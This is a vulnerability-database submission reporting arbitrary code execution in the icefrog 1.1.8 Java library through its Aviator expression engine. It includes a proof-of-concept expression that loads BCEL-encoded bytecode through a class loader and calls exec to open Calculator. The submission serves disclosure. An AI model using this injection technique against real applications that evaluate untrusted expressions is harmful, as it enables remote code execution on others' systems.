Invia #169999: icefrog v1.1.8 Hava an Execute Arbitrary Code vulnerabilityinformazioni

Titoloicefrog v1.1.8 Hava an Execute Arbitrary Code vulnerability
DescrizioneIceFrog is a suite of core and expanded libraries that include utility classes, collections, I/O classes, and much more.a tools like Guava ,apache commons,hutool. In icefrog 1.1.8, the reference enters the aviator engine to parse the expression, and the aviator expression can directly enter the new object, but it is not allowed to call non-public static methods. You can use BCELClassloader to load BCEL code to accomplish RCE. When a user uses icefrog to parse an expression, the aviator template engine is triggered, leading to an arbitrary code execution vulnerability. the testCode is here: import com.whaleal.icefrog.extra.expression.ExpressionUtil; String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );"; final Object eval = ExpressionUtil.eval(exp, null);
Fonte⚠️ https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md
Utente
 dreamfly (UID 37785)
Sottomissione15/06/2023 08:58 (3 anni fa)
Moderazione18/06/2023 09:49 (3 days later)
StatoAccettato
Voce VulDB231804 [whaleal IceFrog 1.1.8 Aviator Template Engine escalationi di privilegi]
Punti20

Do you want to use VulDB in your project?

Use the official API to access entries easily!